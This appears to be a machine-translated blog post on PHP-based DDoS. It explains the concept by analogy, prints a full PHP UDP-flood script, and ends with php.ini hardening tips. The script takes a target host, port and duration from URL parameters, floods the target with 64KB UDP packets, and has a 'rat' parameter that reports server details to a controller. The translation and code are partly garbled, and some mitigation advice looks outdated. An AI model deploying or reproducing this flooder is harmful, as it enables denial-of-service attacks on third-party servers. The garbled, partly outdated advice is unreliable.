First Look at DDoS: Distributed denial of service (ddos:distributed denial of services) attack refers to the use of client/server technology to unite multiple computers as an attack platform to launch a DDoS attack on one or more targets, thereby multiplying the power of a denial of service attack. Typically, an attacker would use a theft account to install a DDoS master program on a computer, where a set time master will communicate with a large number of agents, and the agent is already installed on many computers on the network. An agent launches an attack when it receives an instruction. With client/server technology, the master program can activate hundreds of agents within seconds.
A deep understanding of what DDoS is, from an analogy.
What will they do if a bunch of bullies try to keep a rival shop in the opposite direction from operating normally? (Just for example, do not imitate) the bully disguised as an ordinary customer has been crowded in the opponent's shop, relying on not to go, the real shopper is unable to enter, or always and the salesperson desultorily, so that staff can not normal service customers, but also for the shop operators to provide false information, Shop up and down busy into a group, but found all is a empty, finally ran the real big customer, the loss of heavy. In addition, bullies sometimes do things that are hard to accomplish by themselves and need to be called together. Well, the DOS and DDoS attacks in the cyber security world follow these ideas.
This article mainly introduces the solution of the DDoS Attack of PHP, the example analyzes the principle of the DDoS attack program and the targeted solution, is very practical skills, the need for friends can refer to the next
First look at the source code, the following:
<?php Set_time_limit (999999); $host = $_get[' host ']; $port = $_get[' Port ']; $exec _time = $_get[' time '); $Sendlen = 65535; $packets = 0; Ignore_user_abort (True); if (StrLen ($host) ==0 or StrLen ($port) ==0 or StrLen ($exec _time) ==0) {if (StrLen ($_get[' rat ']) <>0) { echo $_get[' rat '].$_server["Http_host"]. "|". gethostbyname ($_server[' server_name '). "|". Php_uname (). "|". $_server[' server_software '].$_get[' rat '; Exit } echo "Parameters can not be empty!"; Exit } for ($i =0; $i < $Sendlen; $i + +) {$out. = "A"; } $max _time = time () + $exec _time; while (1) {$packets + +; if (Time () > $max _time) {break; } $fp = Fsockopen ("udp://$host", $port, $errno, $ERRSTR, 5); if ($fp) {fwrite ($fp, $out); Fclose ($FP); }} echo "Send Host: $host: $port <br><br>"; echo "Send Flow: $packets * ($Sendlen/1024=". Round ($Sendlen/1024, 2). ") kb/1024 =". Round$packets * $Sendlen/1024/1024, 2). "Mb<br><br>"; echo "Send rate:". Round ($packets/$exec _time, 2). "PACKS/S;". Round ($packets/$exec _time* $Sendlen/1024/1024, 2). "MB/s";?>
The key code is as follows:
$fp = Fsockopen ("udp://$ip", $rand, $errno, $ERRSTR, 5);
The method is very simple, send UDP packets to the target host, and in addition to define infinite dead loop, it will form a large pressure.
This pressure is for the server to execute this script, because it first on its own network width, CPU and other resources caused a lot of occupation, if you want to use this script to the target site pressure, need to execute the script on multiple servers, DDoS, since it is used Fsockopen request external, it will not let him request .
php.ini , the code is as follows:
Allow_url_fopen = Off
If so he can still contract, the code is as follows:
Extension=php_sockets.dll
Change into
; Extension=php_sockets.dll
Restart Apache, IIS, and NGINX so you can prevent a PHP DDoS contract.
Another netizen said, let the script does not allow setting to not timeout is very simple:
1. Disable the Set_time_limit function
2. Enable PHP security Mode (Safe_mode=on).
Disabling the socket function can disable the socket module directly or disable the Fsockopen function, it is recommended that because the socket is often used to send back the password, it is recommended to turn on the direct-on security mode, but in this case, the script expires every 30 seconds, it is estimated that no "Hacker" lonely to every 30 seconds to point to start DDoS.